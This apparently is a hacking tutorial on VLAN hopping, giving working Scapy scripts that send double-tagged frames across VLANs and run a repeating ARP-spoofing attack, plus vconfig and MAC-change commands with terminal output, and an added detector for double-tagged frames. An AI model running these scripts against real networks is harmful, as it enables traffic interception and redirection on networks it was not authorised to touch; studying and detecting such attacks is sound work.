VLAN
A VLAN (Virtual Local Area Network) separates several networks on a logical basis. Only devices on the
same VLAN can see each other. VLANs were invented to define a network's
structure independently from its physical hardware, to prioritize connections
and to minimize broadcast traffic. They were not developed with security in
mind, but it's a common myth that VLANs can add to your security. Don’t rely on
this myth, because several ways exist to circumvent the separation of a
VLAN.
Switches implement VLANs in two different ways:
by tagging packets with an IEEE 802.1Q header, which is inserted after the
Ethernet header, or simply by port.
802.1Q is the newer variant, which allows the creation of a VLAN
spread over several switches.
VLAN Hopping
As already mentioned, VLANs are not a security feature, because the
additional security of a modern, tagged VLAN depends on a
header added to the packet that includes the VLAN ID. Such a packet can easily be
created with Scapy. Let's say our computer is connected to VLAN 1 and wants to
ping another one on VLAN 2.
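#!/usr/bin/env python3
from scapy.all import Ether, Dot1Q, IP, ICMP, sendp

# Outer tag: the VLAN we are connected to; inner tag: the destination VLAN
packet = Ether(dst="c0:d3:de:ad:be:ef") / \
    Dot1Q(vlan=1) / \
    Dot1Q(vlan=2) / \
    IP(dst="192.168.13.23") / \
    ICMP()

sendp(packet)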
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo python3 vlan.py
.
Sent 1 packets.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo python3 vlan.py
.
Sent 1 packets.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$
First we put the header with our own VLAN tag into
the packet and afterwards the one of the destination host. The switch will
remove the first tag, then decide how to react to the packet; seeing the
second tag with VLAN ID 2, it decides to forward the packet to that VLAN. On some
switches this attack will only be successful if the switch is connected to other
VLAN-enabled switches via stacking, because otherwise they
use port-based
VLAN.
Let’s Play Switch
Linux runs on a lot of embedded network devices; therefore it
should not be surprising that one can turn their own computer into a
full-featured VLAN switch thanks to Linux. All you need is the tool
vconfig. After installing the required
package for
your distribution, you can add your host to another VLAN with the following
command.
vconfig add wlan0 2
Afterwards you must remember to start the new device and
give it an IP address of the VLAN network!
ifconfig wlan0.2 192.168.13.23 up
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ ifconfig
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.21.25  netmask 255.255.255.0  broadcast 192.168.21.255
        inet6 2409:4064:2001:6d85:775:f2bc:96b8:70fc  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 63482  bytes 39443272 (37.6 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 58826  bytes 15548253 (14.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo vconfig add wlan0 2
Warning: vconfig is deprecated and might be removed in the future, please migrate to ip(route2) as soon as possible!

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo ifconfig wlan0.2 192.168.13.23 up

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ ifconfig
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.21.25  netmask 255.255.255.0  broadcast 192.168.21.255
        inet6 2409:4064:2001:6d85:775:f2bc:96b8:70fc  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 64616  bytes 39837956 (37.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 60023  bytes 15811522 (15.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0.2: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.13.23  netmask 255.255.255.0  broadcast 192.168.13.255
        inet6 fe80::fe01:7cff:fe29:77  prefixlen 64  scopeid 0x20
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 9  bytes 726 (726.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$
ARP Spoofing Over VLAN Hopping
VLANs limit broadcast traffic to the ports belonging to the same VLAN. Therefore we cannot by default react to all ARP requests, but have to proactively tell the victim our MAC every few seconds, as seen in the first ARP spoofing example. The code is identical except for the fact that we tag every packet for our own VLAN and then additionally for the destination VLAN.
#!/usr/bin/env python3
import time
from scapy.all import sendp, ARP, Ether, Dot1Q

iface = "wlan0"
target_ip = '192.168.13.23'
fake_ip = '192.168.13.5'
fake_mac = 'c0:d3:de:ad:be:ef'
our_vlan = 1
target_vlan = 2

# Tag the ARP reply first for our own VLAN, then for the destination VLAN
packet = Ether() / \
    Dot1Q(vlan=our_vlan) / \
    Dot1Q(vlan=target_vlan) / \
    ARP(hwsrc=fake_mac, pdst=target_ip, psrc=fake_ip, op="is-at")

while True:
    sendp(packet, iface=iface)
    time.sleep(10)
Luckily it's not that complicated to protect against those kinds of VLAN attacks: just use physically divided switches if you really want to separate your networks!
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo python3 vlan-hopping.py                                    1 ⨯ 1 ⚙
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
^CTraceback (most recent call last):
  File "/home/hackerboy/Desktop/python/mymodule/vlan-hopping.py", line 20, in <module>
    time.sleep(10)
KeyboardInterrupt

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$
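Seen from the defender's side, the double-tagged frames used in the VLAN hopping and ARP spoofing sections stand out on a capture, because an end host has no reason to send two stacked 802.1Q tags. The following is an added example, not part of the original post: it parses the tag stack of raw Ethernet frames with the standard library only. The function names, the port_vlan parameter and the sample frames are constructed for illustration, using the addresses from this page.

```python
import socket
import struct

TPIDS = {0x8100, 0x88A8}  # 802.1Q and 802.1ad tag protocol identifiers
ETH_ARP = 0x0806

def parse_tags(frame):
    """Return (vlan_ids, ethertype, payload) of a raw Ethernet frame."""
    if len(frame) < 14:
        raise ValueError("truncated Ethernet header")
    offset, vlans = 12, []  # 12 = destination MAC + source MAC
    (etype,) = struct.unpack_from("!H", frame, offset)
    while etype in TPIDS:
        if len(frame) < offset + 6:
            raise ValueError("truncated VLAN tag")
        tci, etype = struct.unpack_from("!HH", frame, offset + 2)
        vlans.append(tci & 0x0FFF)  # low 12 bits of the TCI hold the VLAN ID
        offset += 4
    return vlans, etype, frame[offset + 2:]

def inspect(frame, port_vlan=1):
    """Summarise what a monitor should alert on (port_vlan is an assumed setting)."""
    vlans, etype, payload = parse_tags(frame)
    report = {"vlans": vlans, "double_tagged": len(vlans) >= 2,
              "outer_is_port_vlan": len(vlans) >= 2 and vlans[0] == port_vlan,
              "arp_reply": None}
    if etype == ETH_ARP and len(payload) >= 28:
        op, sha, spa = struct.unpack_from("!H6s4s", payload, 6)
        if op == 2:  # opcode 2 = reply ("is-at")
            report["arp_reply"] = (sha.hex(":"), socket.inet_ntoa(spa))
    return report

def build(vlans, etype, payload):
    """Constructed sample frame, for offline testing only."""
    dst, src = bytes.fromhex("ffffffffffff"), bytes.fromhex("c0d3deadbeef")
    tags = b"".join(struct.pack("!HH", 0x8100, v) for v in vlans)
    return dst + src + tags + struct.pack("!H", etype) + payload

ARP_IS_AT = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 2,
                        bytes.fromhex("c0d3deadbeef"), socket.inet_aton("192.168.13.5"),
                        bytes(6), socket.inet_aton("192.168.13.23"))
SAMPLES = {  # constructed frames
    "untagged ARP reply": build([], ETH_ARP, ARP_IS_AT),
    "single tag, IPv4": build([2], 0x0800, b"\x45" + bytes(19)),
    "double tag, ARP reply": build([1, 2], ETH_ARP, ARP_IS_AT),
}

if __name__ == "__main__":
    for name, frame in SAMPLES.items():
        print(name, inspect(frame))
```

A frame reported with double_tagged set, and especially one that also carries an ARP reply, is the pattern both scripts above produce.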
If you want to change the MAC address of the VLAN interface (like wlan0.2), you can use this command:
sudo ifconfig wlan0.2 hw ether fc:01:7c:29:00:77
- wlan0.2 is our VLAN interface.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo ifconfig wlan0.2 hw ether fc:01:7c:29:00:77

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ ifconfig
wlan0.2: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.13.23  netmask 255.255.255.0  broadcast 192.168.13.255
        inet6 fe80::fe01:7cff:fe29:77  prefixlen 64  scopeid 0x20
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 23  bytes 1692 (1.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$